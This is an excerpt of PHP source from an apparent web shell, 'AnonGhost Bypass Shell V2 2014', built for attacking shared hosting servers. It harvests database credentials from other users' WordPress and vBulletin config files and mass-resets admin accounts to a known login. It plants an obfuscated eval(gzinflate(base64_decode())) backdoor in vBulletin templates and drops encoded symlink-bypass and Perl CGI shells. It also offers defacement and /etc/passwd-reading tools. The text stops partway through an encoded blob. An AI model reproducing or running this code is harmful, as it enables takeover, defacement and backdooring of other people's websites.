Mass Deface Dirs - Mass Change Admin Joomla - Mass Change Admin vBulletin - Mass Change Admin WordPress - Wordpress & Joomla Mass Deface - Wordpress Index Hijack Priv8 - Joomla Index Changer - Wordpress Index Changer - Cpanel & Ftp Auto Defacer
'; echo '
Mass Change Admin Mass WordPress

'; if(isset($_POST['s'])){ $file = @file_get_contents('wp.txt'); $ex = explode("\n",$file); echo "
"; flush(); flush(); foreach ($ex as $exp){ $es = explode("||",$exp); $config = $es[0]; $domin = $es[1]; $domins = trim($domin).''; $readconfig = @file_get_contents(trim($config)); if(ereg('wp-settings.php',$readconfig)){ $pass = ex($readconfig,"define('DB_PASSWORD', '","');"); $userdb = ex($readconfig,"define('DB_USER', '","');"); $db = ex($readconfig,"define('DB_NAME', '","');"); $fix = ex($readconfig,'$table_prefix = \'',"';"); $tab = $fix.'users'; $con = @mysql_connect('localhost',$userdb,$pass); $db = @mysql_select_db($db,$con); $query = @mysql_query("UPDATE `$tab` SET `user_login` ='virusa'") or die; $query = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die; if ($query){$r = 'Succeed user [virusa] pass [1]';} else { $r = 'failed'; } $domins = trim($domin).''; echo ""; flush(); flush(); }else{ echo ""; flush(); flush(); } } die(); } if(!is_file('named.txt')){ $d00m = @file("/etc/named.conf"); }else{ $d00m = @file("named.txt"); } if(!$d00m) { die (""); } else { echo "

Domains Configs Result
".$r."
failed2
"; flush(); flush(); $f = fopen('wp.txt','w'); foreach($d00m as $dom){ if(eregi("zone",$dom)){ preg_match_all('#zone "(.*)"#', $dom, $domvw); if(strlen(trim($domvw[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domvw[1][0])); $wpl=$pageURL."/sim/rut/home/".$user['name']."/public_html/wp-config.php"; $wpp=get_headers($wpl); $wp=$wpp[0]; $wp2=$pageURL."/sim/rut/home/".$user['name']."/public_html/blog/wp-config.php"; $wpp2=get_headers($wp2); $wp12=$wpp2[0]; $wp3=$pageURL."/sim/rut/home/".$user['name']."/public_html/wp/wp-config"; $wpp3=get_headers($wp3); $wp13=$wpp3[0]; $pos = strpos($wp, "200"); $config=" "; if (strpos($wp, "200") == true ) { $config= $wpl; } elseif (strpos($wp12, "200") == true) { $config= $wp2; } elseif (strpos($wp13, "200") == true) { $config= $wp3; } else { continue; } flush(); $dom = $domvw[1][0]; $w = fwrite($f,"$config||$dom \n"); if($w){$r = 'Save';}else{$r = 'failed';} echo ""; flush(); flush(); flush(); } } } } echo "
Domains Config Result
".$r."


"; } if(isset($_GET['action']) && $_GET['action'] == 'vb'){ echo '
Mass Deface Dirs - Mass Change Admin Joomla - Mass Change Admin vBulletin - Mass Change Admin WordPress - Wordpress & Joomla Mass Deface - Wordpress Index Hijack Priv8 - Joomla Index Changer - Wordpress Index Changer - Cpanel & Ftp Auto Defacer
'; echo '
Mass Change Admin vBulletin

'; if(isset($_POST['s'])){ $file = @file_get_contents('vb.txt'); $ex = explode("\n",$file); echo "
"; foreach ($ex as $exp){ $es = explode("||",$exp); $config = $es[0]; $domin = $es[1]; $domins = trim($domin).''; $readconfig = @file_get_contents(trim($config)); if(ereg('vBulletin',$readconfig)){ $db = ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';"); $userdb = ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';"); $pass = ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';"); $con = @mysql_connect('localhost',$userdb,$pass); $db = @mysql_select_db($db,$con); $shell = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ; $crypt = "{\${eval(gzinflate(base64_decode(\'"; $crypt .= "$shell"; $crypt .= "\')))}}{\${exit()}}"; $sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ; $query = @mysql_query($sqlfaq,$con); if ($query){$r = 'Succeed shell in search.php';} else { $r = 'failed'; } $domins = trim($domin).''; echo ""; }else{ echo ""; } } die(); } if(!is_file('named.txt')){ $d00m = file("/etc/named.conf"); }else{ $d00m = file("named.txt"); } if(!$d00m) { die (""); } else { echo "

Domains Configs Result
".$r."
failed2
"; $f = fopen('vb.txt','w'); foreach($d00m as $dom){ if(eregi("zone",$dom)){ preg_match_all('#zone "(.*)"#', $dom, $domvw); if(strlen(trim($domvw[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domvw[1][0])); /////////////////////////////////////////////////////////////////////////////////// $wpl=$pageURL."/sim/rut/home/".$user['name']."/includes/config.php"; $wpp=get_headers($wpl); $wp=$wpp[0]; $wp2=$pageURL."/sim/rut/home/".$user['name']."/vb/includes/config.php"; $wpp2=get_headers($wp2); $wp12=$wpp2[0]; $wp3=$pageURL."/sim/rut/home/".$user['name']."/forum/includes/config.php"; $wpp3=get_headers($wp3); $wp13=$wpp3[0]; ////////// vb //////////// $pos = strpos($wp, "200"); $config=" "; if (strpos($wp, "200") == true ) { $config= $wpl; } elseif (strpos($wp12, "200") == true) { $config= $wp2; } elseif (strpos($wp13, "200") == true) { $config= $wp3; } else { continue; } flush(); $dom = $domvw[1][0]; $w = fwrite($f,"$config||$dom \n"); if($w){$r = 'Save';}else{$r = 'failed';} echo ""; flush(); } } } } echo "
Domains Config Result
".$r."


"; } if(isset($_GET['action']) && $_GET['action'] == 'abot'){ echo '
AnonGhost Bypass Shell V2 2014
Coded by Virusa Worm - Mauritania Attacker - GrenCoder


AnonGhost Bypass Shell V2 2014 is created for Educational Purpose and testing on your own server, and not responsible for any misuse of it.

At first a Web Hacker was someone who would spend long hours trying to find bugs and exploit manually.
The term has now changed known as a Defacer nowadays.
Tools does not Made Hackers , Hackers make Tools.
Do not Learn To Hack , Hack to Learn.wkkwk..

"Keep Calm and enjoy Hacking \!/"


Special thankz to : AnonGhost Team


Greetz to :
AnonGhost - Teamp0ison - ZHC - Mauritania HaCker Team - 3xp1r3 Cyber Army - TeaMp0isoN - Robot Pirates - X-Blackerz INC. - Pak Cyber Pyrates - iMHATiMi.ORG - Afghan Cyber Army (ACA) - [ Tanpa Bicara - Maniak k4Sur [pasangan galo.. lol..]]
'; } if(isset($_GET['action']) && $_GET['action'] == 'read'){ echo '
Symlink Info - Cms Scanner - Perl based symlink - Symlink Manual - Manually Retrieve Config - Enable Symlink If Disabled - Python Bypass Forbidden Via TCP Protocol - Symlink Bypass 2014
'; echo '
Read /etc/passwd

'; echo "


"; if(isset($_GET['save'])){ $cont = stripcslashes($_POST['file']); $f = fopen('named.txt','w'); $w = fwrite($f,$cont); if($w){ echo '
save has been successfully'; } fclose($f); } } if(isset($_GET['action']) && $_GET['action'] == 'bforb'){ echo '
Bypass /etc/passwd - Bypass Users Server - Bypass Perl Security - Bypass With Zip File - Bypass system function - Bypass With exec Function - Bypass With shell_exec - Bypass posix_getpwuid - Bypass PHP Suhosin function blacklist - Bypass Functions suPHP_ConfigPath - Bypass suPHP Security - Simple Bypasser - Read Files - Bypass Chmod Directory - Bypass Forbidden 2014 - Bypass SafeMode 2014 Priv8
'; echo '
Bypass Root Path with system function

'; mkdir('bforb', 0755); chdir('bforb'); $bforb = 'PGhlYWQ+PHRpdGxlPkJ5cGFzcyBCeXBhc3MgUm9vdCBQYXRoIGJ5IFZpcnVzYSBXb3JtPC90aXRsZT48L2hlYWQ+PGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSJodHRwOi8vd3d3Lmljb25qLmNvbS9pY28vYy91L2N1MWJtcGdiMWsuaWNvIiB0eXBlPSJpbWFnZS94LWljb24iIC8+PHN0eWxlIHR5cGU9InRleHQvY3NzIj48IS0tIGJvZHkge2JhY2tncm91bmQtY29sb3I6IHRyYW5zcGFyZW50OyBmb250LWZhbWlseTpDb3VyaWVyCW1hcmdpbi1sZWZ0OiAwcHg7IG1hcmdpbi10b3A6IDBweDsgdGV4dC1hbGlnbjogY2VudGVyOyBOZXc7Zm9udC1zaXplOjEycHg7Y29sb3I6IzAwOTkwMDtmb250LXdlaWdodDo0MDA7fSBhe3RleHQtZGVjb3JhdGlvbjpub25lO30gYTpsaW5rIHtjb2xvcjojMDA5OTAwO30gYTp2aXNpdGVkIHtjb2xvcjojMDA3NzAwO30gYTpob3Zlcntjb2xvcjojMDBmZjAwO30gYTphY3RpdmUge2NvbG9yOiMwMDk5MDA7fSAtLT48IS0tIE1hZGUgQnkgVmlydXNhIFdvcm0gLS0+PC9zdHlsZT48YnI+PGJyPjxib2R5IGJnQ29sb3I9IjAwMDAwMCI+PHRyPjx0ZD48P3BocCBlY2hvICI8Zm9ybSBtZXRob2Q9J1BPU1QnIGFjdGlvbj0nJz4iIDsgZWNobyAiPGNlbnRlcj48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0nQnlwYXNzIGl0JyBuYW1lPSd2aXJ1c2EnPjwvY2VudGVyPiI7IGlmIChpc3NldCgkX1BPU1RbJ3ZpcnVzYSddKSl7IHN5c3RlbSgnbG4gLXMgLyB2aXJ1c2EudHh0Jyk7ICRmdmNrZW0gPSdUM0IwYVc5dWN5QkpibVJsZUdWeklFWnZiR3h2ZDFONWJVeHBibXR6RFFwRWFYSmxZM1J2Y25sSmJtUmxlQ0J6YzNOemMzTXVhSFJ0RFFwQlpHUlVlWEJsSUhSNGRDQXVjR2h3RFFwQlpHUklZVzVrYkdWeUlIUjRkQ0F1Y0dodyc7ICRmaWxlID0gZm9wZW4oIi5odGFjY2VzcyIsIncrIik7ICR3cml0ZSA9IGZ3cml0ZSAoJGZpbGUgLGJhc2U2NF9kZWNvZGUoJGZ2Y2tlbSkpOyAkdmlydXNhID0gc3ltbGluaygiLyIsInZpcnVzYS50eHQiKTsgJHJ0PSI8YnI+PGEgaHJlZj12aXJ1c2EudHh0IFRBUkdFVD0nX2JsYW5rJz48Zm9udCBjb2xvcj0jMDBiYjAwIHNpemU9MiBmYWNlPSdDb3VyaWVyIE5ldyc+PGI+QnlwYXNzZWQgU3VjY2Vzc2Z1bGx5PC9iPjwvZm9udD48L2E+IjsgZWNobyAiPGJyPjxicj48Yj5Eb25lLi4gITwvYj48YnI+PGJyPkNoZWNrIGxpbmsgZ2l2ZW4gYmVsb3cgZm9yIC8gZm9sZGVyIHN5bWxpbmsgPGJyPiRydDwvY2VudGVyPiI7fSBlY2hvICI8L2Zvcm0+IjsgID8+PC90ZD48L3RyPjwvYm9keT48L2h0bWw+'; $file = fopen("bforb.php" ,"w+"); $write = fwrite ($file ,base64_decode($bforb)); fclose($file); chmod("bforb.php",0755); echo ""; } if(isset($_GET['action']) && $_GET['action'] == 'grasy'){ echo '
Bypass /etc/passwd - Bypass Users Server - Bypass Perl Security - Bypass With Zip File - Bypass system function - Bypass With exec Function - Bypass With shell_exec - Bypass posix_getpwuid - Bypass PHP Suhosin function blacklist - Bypass Functions suPHP_ConfigPath - Bypass suPHP Security - Simple Bypasser - Read Files - Bypass Chmod Directory - Bypass Forbidden 2014 - Bypass SafeMode 2014 Priv8
'; echo '
Bypass /etc/passwd Priv8
Coded By Mauritania Attacker


'; echo '

Bypass with System Function

Bypass with Passthru Function

Bypass with exec Function

Bypass with shell_exec Function

Bypass with posix_getpwuid Function

'; //System Function // if($_POST['syst']) { echo"
"; echo"

"; } echo '
'; //Passthru Function // if($_POST['passth']) { echo"
"; echo"

"; } echo '
'; //exec Function // if($_POST['ex']) { echo"
"; echo"

"; } echo '
'; //exec Function // if($_POST['shex']) { echo"
"; echo"

"; } echo '
'; //posix_getpwuid Function // if($_POST['mauritania']) { echo"
"; echo"

"; } } if(isset($_GET['action']) && $_GET['action'] == 'nemcon'){ echo '
Bypass /etc/passwd - Bypass Users Server - Bypass Perl Security - Bypass With Zip File - Bypass system function - Bypass With exec Function - Bypass With shell_exec - Bypass posix_getpwuid - Bypass PHP Suhosin function blacklist - Bypass Functions suPHP_ConfigPath - Bypass suPHP Security - Simple Bypasser - Read Files - Bypass Chmod Directory - Bypass Forbidden 2014 - Bypass SafeMode 2014 Priv8
'; echo '
Bypass Users Server Priv8
Coded By Mauritania Attacker


'; echo '

Bypass with awk program

Bypass with System Function

Bypass with Passthru Function

Bypass with exec Function

Bypass with shell_exec Function

'; //Awk Program // if ($_POST['awk']) { echo"
"; echo "

"; } echo "
"; //System Function // if ($_POST['syst']) { echo"
"; echo "

"; } echo "
"; //Passthru Function // if ($_POST['passth']) { echo"
"; echo "

"; } echo "
"; //exec Function // if ($_POST['ex']) { echo"
"; echo "

"; } echo "
"; //exec Function // if ($_POST['shex']) { echo"
"; echo "

"; } } if(isset($_GET['action']) && $_GET['action'] == 'cgipl'){ echo '
Bypass /etc/passwd - Bypass Users Server - Bypass Perl Security - Bypass With Zip File - Bypass system function - Bypass With exec Function - Bypass With shell_exec - Bypass posix_getpwuid - Bypass PHP Suhosin function blacklist - Bypass Functions suPHP_ConfigPath - Bypass suPHP Security - Simple Bypasser - Read Files - Bypass Chmod Directory - Bypass Forbidden 2014 - Bypass SafeMode 2014 Priv8
'; mkdir('cgipl', 0755); chdir('cgipl'); $kokdosya = ".htaccess"; $dosya_adi = "$kokdosya"; $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!"); $metin = "AddType application/x-httpd-cgi .root AddType application/x-httpd-cgi .root AddHandler cgi-script .root AddHandler cgi-script .root"; fwrite ( $dosya , $metin ) ; fclose ($dosya); $cgipl = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2Ij5Bbm9uR2hvc3QgUGVybCBzaGVsbDwvYj4gIyBzZXJ2ZXINCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBDb25maWd1cmF0aW9uOiBZb3UgbmVlZCB0byBjaGFuZ2Ugb25seSAkUGFzc3dvcmQgYW5kICRXaW5OVC4gVGhlIG90aGVyDQojIHZhbHVlcyBzaG91bGQgd29yayBmaW5lIGZvciBtb3N0IHN5c3RlbXMuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQokUGFzc3dvcmQgPSAiZ2hvc3QiOwkJIyBDaGFuZ2UgdGhpcy4gWW91IHdpbGwgbmVlZCB0byBlbnRlciB0aGlzDQoJCQkJIyB0byBsb2dpbi4NCg0KJFdpbk5UID0gMDsJCQkjIFlvdSBuZWVkIHRvIGNoYW5nZSB0aGUgdmFsdWUgb2YgdGhpcyB0byAxIGlmDQoJCQkJIyB5b3UncmUgcnVubmluZyB0aGlzIHNjcmlwdCBvbiBhIFdpbmRvd3MgTlQNCgkJCQkjIG1hY2hpbmUuIElmIHlvdSdyZSBydW5uaW5nIGl0IG9uIFVuaXgsIHlvdQ0KCQkJCSMgY2FuIGxlYXZlIHRoZSB2YWx1ZSBhcyBpdCBpcy4NCg0KJE5UQ21kU2VwID0gIiYiOwkJIyBUaGlzIGNoYXJhY3RlciBpcyB1c2VkIHRvIHNlcGVyYXRlIDIgY29tbWFuZHMNCgkJCQkjIGluIGEgY29tbWFuZCBsaW5lIG9uIFdpbmRvd3MgTlQuDQoNCiRVbml4Q21kU2VwID0gIjsiOwkJIyBUaGlzIGNoYXJhY3RlciBpcyB1c2VkIHRvIHNlcGVyYXRlIDIgY29tbWFuZHMNCgkJCQkjIGluIGEgY29tbWFuZCBsaW5lIG9uIFVuaXguDQoNCiRDb21tYW5kVGltZW91dER1cmF0aW9uID0gMTA7CSMgVGltZSBpbiBzZWNvbmRzIGFmdGVyIGNvbW1hbmRzIHdpbGwgYmUga2lsbGVkDQoJCQkJIyBEb24ndCBzZXQgdGhpcyB0byBhIHZlcnkgbGFyZ2UgdmFsdWUuIFRoaXMgaXMNCgkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0DQoJCQkJIyB0YWtlIHZlcnkgbG9uZyB0byBleGVjdXRlLCBsaWtlICJmaW5kIC8iLg0KCQkJCSMgVGhpcyBpcyB2YWxpZCBvbmx5IG9uIFVuaXggc2VydmVycy4gSXQgaXMNCgkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4NCg0KJFNob3dEeW5hbWljT3V0cHV0ID0gMTsJCSMgSWYgdGhpcyBpcyAxLCB0aGVuIGRhdGEgaXMgc2VudCB0byB0aGUNCgkJCQkjIGJyb3dzZXIgYXMgc29vbiBhcyBpdCBpcyBvdXRwdXQsIG90aGVyd2lzZQ0KCQkJCSMgaXQgaXMgYnVmZmVyZWQgYW5kIHNlbmQgd2hlbiB0aGUgY29tbWFuZA0KCQkJCSMgY29tcGxldGVzLiBUaGlzIGlzIHVzZWZ1bCBmb3IgY29tbWFuZHMgbGlrZQ0KCQkJCSMgcGluZywgc28gdGhhdCB5b3UgY2FuIHNlZSB0aGUgb3V0cHV0IGFzIGl0DQoJCQkJIyBpcyBiZWluZyBnZW5lcmF0ZWQuDQoNCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISENCg0KJENtZFNlcCA9ICgkV2luTlQgPyAkTlRDbWRTZXAgOiAkVW5peENtZFNlcCk7DQokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7DQokUGF0aFNlcCA9ICgkV2luTlQgPyAiXFwiIDogIi8iKTsNCiRSZWRpcmVjdG9yID0gKCRXaW5OVCA/ICIgMj4mMSAxPiYyIiA6ICIgMT4mMSAyPiYxIik7DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUmVhZHMgdGhlIGlucHV0IHNlbnQgYnkgdGhlIGJyb3dzZXIgYW5kIHBhcnNlcyB0aGUgaW5wdXQgdmFyaWFibGVzLiBJdA0KIyBwYXJzZXMgR0VULCBQT1NUIGFuZCBtdWx0aXBhcnQvZm9ybS1kYXRhIHRoYXQgaXMgdXNlZCBmb3IgdXBsb2FkaW5nIGZpbGVzLg0KIyBUaGUgZmlsZW5hbWUgaXMgc3RvcmVkIGluICRpbnsnZid9IGFuZCB0aGUgZGF0YSBpcyBzdG9yZWQgaW4gJGlueydmaWxlZGF0YSd9Lg0KIyBPdGhlciB2YXJpYWJsZXMgY2FuIGJlIGFjY2Vzc2VkIHVzaW5nICRpbnsndmFyJ30sIHdoZXJlIHZhciBpcyB0aGUgbmFtZSBvZg0KIyB0aGUgdmFyaWFibGUuIE5vdGU6IE1vc3Qgb2YgdGhlIGNvZGUgaW4gdGhpcyBmdW5jdGlvbiBpcyB0YWtlbiBmcm9tIG90aGVyIENHSQ0KIyBzY3JpcHRzLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFJlYWRQYXJzZSANCnsNCglsb2NhbCAoKmluKSA9IEBfIGlmIEBfOw0KCWxvY2FsICgkaSwgJGxvYywgJGtleSwgJHZhbCk7DQoJDQoJJE11bHRpcGFydEZvcm1EYXRhID0gJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC87DQoNCglpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJHRVQiKQ0KCXsNCgkJJGluID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQoJfQ0KCWVsc2lmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIlBPU1QiKQ0KCXsNCgkJYmlubW9kZShTVERJTikgaWYgJE11bHRpcGFydEZvcm1EYXRhICYgJFdpbk5UOw0KCQlyZWFkKFNURElOLCAkaW4sICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KCX0NCg0KCSMgaGFuZGxlIGZpbGUgdXBsb2FkIGRhdGENCglpZigkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLykNCgl7DQoJCSRCb3VuZGFyeSA9ICctLScuJDE7ICMgcGxlYXNlIHJlZmVyIHRvIFJGQzE4NjcgDQoJCUBsaXN0ID0gc3BsaXQoLyRCb3VuZGFyeS8sICRpbik7IA0KCQkkSGVhZGVyQm9keSA9ICRsaXN0WzFdOw0KCQkkSGVhZGVyQm9keSA9fiAvXHJcblxyXG58XG5cbi87DQoJCSRIZWFkZXIgPSAkYDsNCgkJJEJvZHkgPSAkJzsNCiAJCSRCb2R5ID1+IHMvXHJcbiQvLzsgIyB0aGUgbGFzdCBcclxuIHdhcyBwdXQgaW4gYnkgTmV0c2NhcGUNCgkJJGlueydmaWxlZGF0YSd9ID0gJEJvZHk7DQoJCSRIZWFkZXIgPX4gL2ZpbGVuYW1lPVwiKC4rKVwiLzsgDQoJCSRpbnsnZid9ID0gJDE7IA0KCQkkaW57J2YnfSA9fiBzL1wiLy9nOw0KCQkkaW57J2YnfSA9fiBzL1xzLy9nOw0KDQoJCSMgcGFyc2UgdHJhaWxlcg0KCQlmb3IoJGk9MjsgJGxpc3RbJGldOyAkaSsrKQ0KCQl7IA0KCQkJJGxpc3RbJGldID1+IHMvXi4rbmFtZT0kLy87DQoJCQkkbGlzdFskaV0gPX4gL1wiKFx3KylcIi87DQoJCQkka2V5ID0gJDE7DQoJCQkkdmFsID0gJCc7DQoJCQkkdmFsID1+IHMvKF4oXHJcblxyXG58XG5cbikpfChcclxuJHxcbiQpLy9nOw0KCQkJJHZhbCA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsNCgkJCSRpbnska2V5fSA9ICR2YWw7IA0KCQl9DQoJfQ0KCWVsc2UgIyBzdGFuZGFyZCBwb3N0IGRhdGEgKHVybCBlbmNvZGVkLCBub3QgbXVsdGlwYXJ0KQ0KCXsNCgkJQGluID0gc3BsaXQoLyYvLCAkaW4pOw0KCQlmb3JlYWNoICRpICgwIC4uICQjaW4pDQoJCXsNCgkJCSRpblskaV0gPX4gcy9cKy8gL2c7DQoJCQkoJGtleSwgJHZhbCkgPSBzcGxpdCgvPS8sICRpblskaV0sIDIpOw0KCQkJJGtleSA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gLj0gIlwwIiBpZiAoZGVmaW5lZCgkaW57JGtleX0pKTsNCgkJCSRpbnska2V5fSAuPSAkdmFsOw0KCQl9DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBQYWdlIEhlYWRlcg0KIyBBcmd1bWVudCAxOiBGb3JtIGl0ZW0gbmFtZSB0byB3aGljaCBmb2N1cyBzaG91bGQgYmUgc2V0DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRQYWdlSGVhZGVyDQp7DQoJJEVuY29kZWRDdXJyZW50RGlyID0gJEN1cnJlbnREaXI7DQoJJEVuY29kZWRDdXJyZW50RGlyID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsNCglwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCglwcmludCA8PEVORDsNCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+QW5vbkdob3N0IFBlcmwgc2hlbGw8L3RpdGxlPg0KJEh0bWxNZXRhSGVhZGVyDQoNCjxtZXRhIG5hbWU9ImtleXdvcmRzIiBjb250ZW50PSJBbm9uR2hvc3QsQW5vbkdob3N0LEFub25HaG9zdC5pbmZvLGhhY2tlciI+DQo8bWV0YSBuYW1lPSJkZXNjcmlwdGlvbiIgY29udGVudD0iQW5vbkdob3N0LEFub25HaG9zdCxBbm9uR2hvc3QuaW5mbyxoYWNrZXIiPg0KPC9oZWFkPg0KPGJvZHkgb25Mb2FkPSJkb2N1bWVudC5mLkBfLmZvY3VzKCkiIGJnY29sb3I9IiNGRkZGRkYiIHRvcG1hcmdpbj0iMCIgbGVmdG1hcmdpbj0iMCIgbWFyZ2lud2lkdGg9IjAiIG1hcmdpbmhlaWdodD0iMCIgdGV4dD0iI0ZGMDAwMCI+DQo8dGFibGUgYm9yZGVyPSIxIiB3aWR0aD0iMTAwJSIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIyIj4NCjx0cj4NCjx0ZCBiZ2NvbG9yPSIjRkZGRkZGIiBib3JkZXJjb2xvcj0iI0ZGRkZGRiIgYWxpZ249ImNlbnRlciIgd2lkdGg9IjElIj4NCjxiPjxmb250IHNpemU9IjIiPiM8L2ZvbnQ+PC9iPjwvdGQ+DQo8dGQgYmdjb2xvcj0iI0ZGRkZGRiIgd2lkdGg9Ijk4JSI+PGZvbnQgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+PGI+IA0KPGIgc3R5bGU9ImNvbG9yOmJsYWNrO2JhY2tncm91bmQtY29sb3I6I2ZmZmY2NiI+QW5vbkdob3N0IFBlcmwgc2hlbGw8L2I+IENvbm5lY3RlZCB0byAkU2VydmVyTmFtZTwvYj48L2ZvbnQ+PC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQgY29sc3Bhbj0iMiIgYmdjb2xvcj0iI0ZGRkZGRiI+PGZvbnQgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+DQoNCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPXVwbG9hZCZkPSRFbmNvZGVkQ3VycmVudERpciI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPlVwbG9hZCBGaWxlPC9mb250PjwvYT4gfCANCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+RG93bmxvYWQgRmlsZTwvZm9udD48L2E+IHwNCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWxvZ291dCI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPkRpc2Nvbm5lY3Q8L2ZvbnQ+PC9hPiB8DQo8L2ZvbnQ+PC90ZD4NCjwvdHI+DQo8L3RhYmxlPg0KPGZvbnQgc2l6ZT0iMyI+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50TG9naW5TY3JlZW4NCnsNCgkkTWVzc2FnZSA9IHEkPHByZT48aW1nIGJvcmRlcj0iMCIgc3JjPSJodHRwOi8vaW1nODEwLmltYWdlc2hhY2sudXMvaW1nODEwLzgwNDMvQW5vbkdob3N0MTIucG5nIj48L3ByZT48YnI+PGJyPjwvZm9udD48aDE+RGVmYXVsdCBQYXNzd29yZD1naG9zdDwvaDE+DQokOw0KIycNCglwcmludCA8PEVORDsNCjxjb2RlPg0KDQpUcnlpbmcgJFNlcnZlck5hbWUuLi48YnI+DQpDb25uZWN0ZWQgdG8gJFNlcnZlck5hbWU8YnI+DQpFc2NhcGUgY2hhcmFjdGVyIGlzIF5dDQo8Y29kZT4kTWVzc2FnZQ0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0